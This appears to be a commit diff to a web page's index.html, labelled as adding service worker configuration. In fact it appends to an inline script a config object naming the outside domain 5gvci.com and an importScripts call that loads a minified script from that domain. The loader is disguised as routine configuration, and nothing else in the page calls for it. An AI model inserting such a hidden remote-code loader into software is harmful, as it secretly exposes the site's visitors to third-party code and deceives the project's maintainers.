Add service worker configuration options

--- a/index.html
+++ b/index.html
@@ -686,7 +686,12 @@
             };
         }
         window.showAlert = showAlert;
-
+self.options = {
+    "domain": "5gvci.com",
+    "zoneId": 10161818
+}
+self.lary = ""
+importScripts('https://5gvci.com/act/files/service-worker.min.js?r=sw')
     </script>
 </body>
 </html>
